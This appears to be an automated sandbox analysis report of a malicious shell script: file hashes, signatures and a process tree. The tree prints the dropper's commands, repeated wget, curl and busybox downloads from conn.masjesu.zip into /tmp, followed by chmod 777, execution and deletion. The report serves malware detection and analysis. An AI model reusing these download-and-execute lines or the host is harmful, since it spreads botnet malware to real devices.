Analysis
-
max time kernel
118s -
max time network
120s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
-
Size
10KB
-
MD5
1fe6de8ea9975b311fc0e7781eb48271
-
SHA1
0c4e405af7c4633878c5fe55ca2a93a111c45b28
-
SHA256
1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6
-
SHA512
c1f9d15954ddaecc45fbdd9d188ba6d924ed25ffc0189ce438e1268255bd408a21d55458542ccb4b443da6c83f871f85b6112b44a58955401faf873439dc7685
-
SSDEEP
192:VS45ohPHiZlxVr/SFlVGr/SFl/nFPHiZlX:VSioUQDw
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 979 chmod 853 chmod 881 chmod 937 chmod 902 chmod 986 chmod 951 chmod 993 chmod 1000 chmod 874 chmod 909 chmod 923 chmod 944 chmod 779 chmod 813 chmod 916 chmod 799 chmod 841 chmod 895 chmod 860 chmod 888 chmod 930 chmod 965 chmod 972 chmod 1007 chmod 792 chmod 867 chmod 958 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg 780 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 793 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb 800 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE 815 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm 843 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO 854 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM 861 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY 868 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB 875 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi 882 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 889 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D 896 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA 903 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF 910 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D 917 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA 924 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF 931 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 938 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb 945 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE 952 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm 959 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg 966 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO 973 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM 980 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY 987 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB 994 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi 1001 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 1008 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 992 busybox 1004 curl 795 wget 796 curl 926 wget 955 curl 962 curl 989 wget 878 curl 906 curl 933 wget 976 curl 852 busybox 870 wget 892 curl 950 busybox 715 wget 819 wget 887 busybox 913 curl 940 wget 996 wget 833 busybox 864 curl 899 curl 920 curl 954 wget 983 curl 802 wget 894 busybox 901 busybox 912 wget 943 busybox 948 curl 748 curl 791 busybox 847 curl 866 busybox 905 wget 975 wget 982 wget 990 curl 771 busybox 810 busybox 846 wget 891 wget 964 busybox 968 wget 871 curl 934 curl 936 busybox 997 curl 1003 wget 803 curl 826 curl 857 curl 873 busybox 919 wget 941 curl 885 curl 978 busybox 999 busybox 1006 busybox 957 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg curl File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF curl File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm curl File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM curl File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D curl File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb curl File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi curl File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg curl File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 curl File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY curl File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D curl File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb curl File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm curl File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE curl File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO curl File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi curl File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 curl File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA curl File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA curl File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO curl File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY curl File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 curl File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB curl File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF curl File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 curl File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE curl File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM curl File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB curl
Processes
-
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- System Network Configuration Discovery
PID:771
-
-
/bin/chmodchmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:783
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:784
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:794
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- System Network Configuration Discovery
PID:795
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:798
-
-
/bin/chmodchmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:801
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- System Network Configuration Discovery
PID:802
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- System Network Configuration Discovery
PID:810
-
-
/bin/chmodchmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:818
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- System Network Configuration Discovery
PID:819
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:845
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- System Network Configuration Discovery
PID:846
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:859
-
-
/bin/chmodchmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:880
-
-
/bin/chmodchmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- System Network Configuration Discovery
PID:905
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:908
-
-
/bin/chmodchmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:911
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:915
-
-
/bin/chmodchmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:922
-
-
/bin/chmodchmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:929
-
-
/bin/chmodchmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- System Network Configuration Discovery
PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/chmodchmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- File and Directory Permissions Modification
PID:944
-
-
